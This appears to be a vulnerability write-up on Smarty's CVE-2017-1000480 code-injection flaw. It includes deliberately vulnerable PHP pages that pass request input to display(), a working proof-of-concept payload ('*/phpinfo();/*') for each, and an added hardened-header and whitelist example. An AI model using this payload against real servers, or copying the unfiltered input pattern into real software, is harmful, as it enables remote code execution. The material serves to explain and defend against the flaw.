Smarty <= 3.1.31 command execution RCE, CVE-2017-1000480
Smarty <= 3.1.32 PHP code execution vulnerability
For example, take the following page code:
<?php
require './vendor/autoload.php';

// Custom resource: the template body is fixed, only the name is attacker-controlled.
class Smarty_Resource_Widget extends Smarty_Resource_Custom
{
    protected function fetch($name, &$source, &$mtime)
    {
        $template = "Smarty <=3.1.31 RCE (CVE-2017-1000480)";
        $source = $template;
        $mtime = time();
        return 'mochazz';
    }
}

$smarty = new Smarty();
$smarty->setCacheDir('cache');
$smarty->setCompileDir('compile');
$smarty->setTemplateDir('templates');
$my_security_policy = new Smarty_Security($smarty);
$smarty->enableSecurity($my_security_policy);
$smarty->registerResource('username', new Smarty_Resource_Widget());
// The resource name is taken straight from the query string.
$smarty->display('username:'.$_GET['mochazz']);
?>
The parameter is passed through the mochazz query parameter of this index.php.
POC
Based on the code above, the POC is as follows:
http://192.168.1.1/index.php?mochazz=*/phpinfo();/*
POC2
For example, with the following page code:
<?php
highlight_file(__FILE__);
define('HOST_DIR', __DIR__ . '/');
define('SMARTY_LIBS', HOST_DIR . 'smarty/Smarty.class.php');
define('SMARTY_COMPILE_DIR', HOST_DIR . 'app/templates_c');
define('SMARTY_CACHE_DIR', HOST_DIR . 'app/cache');
require_once(SMARTY_LIBS);

// Custom resource with a fixed template body; the name comes from the request.
class testSmarty extends Smarty_Resource_Custom
{
    protected function fetch($name, &$source, &$mtime)
    {
        $template = "Look at CVE-2017-1000480!";
        $source = $template;
        $mtime = time();
    }
}

$smarty = new Smarty();
// Use the directories defined above so the compiled template is written there.
$smarty->setCompileDir(SMARTY_COMPILE_DIR);
$smarty->setCacheDir(SMARTY_CACHE_DIR);
$smarty->registerResource('test', new testSmarty);
$smarty->display('test:'.$_GET['eval']);
?>
The payload is as follows:
/index.php?eval=*/phpinfo();/*
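As an added example (not from the original post and not Smarty's own source), the following PHP contrasts a simplified reconstruction of the compiled-template header written by the affected versions with a hardened form, and adds the call-site check a defender would put in front of display(): the function names and the version strings in the headers are assumptions for illustration.

```php
<?php
// Added example, not Smarty's own code: the compiled-template header of the
// affected versions embeds the resource name unescaped inside a PHP comment.
function vulnerableCodeFrame(string $templateName, string $compiledBody): string
{
    return "<?php\n/* Smarty version 3.1.31, created on 2017-01-01 00:00:00\n"
         . "  from \"$templateName\" */\n\n" . $compiledBody;
}

// Hardened header: var_export() turns the name into a quoted PHP string
// literal, and any remaining "*/" is split so it can never close the comment.
function hardenedCodeFrame(string $templateName, string $compiledBody): string
{
    $safeName = str_replace('*/', '* /', var_export($templateName, true));
    return "<?php\n/* Smarty version 3.1.32, created on 2017-01-01 00:00:00\n"
         . "  from $safeName */\n\n" . $compiledBody;
}

// Defence at the call site: only accept resource names that can legitimately
// exist, so user input never reaches display() unfiltered.
function validResourceName(string $name): bool
{
    return (bool) preg_match('/^[A-Za-z0-9_\-]{1,64}$/', $name);
}

// Constructed inputs: the payload quoted in the post and a benign name.
$hostile = '*/phpinfo();/*';
$good    = 'welcome';

// Compare the two headers without ever executing the compiled output.
echo "--- affected header ---\n", vulnerableCodeFrame($hostile, "echo 'body';\n");
echo "--- hardened header ---\n", hardenedCodeFrame($hostile, "echo 'body';\n");

var_dump(validResourceName($hostile));
var_dump(validResourceName($good));
```

Running it under the CLI shows the hostile name closing the comment in the first header while the second keeps it inside the comment, and the whitelist rejects it outright.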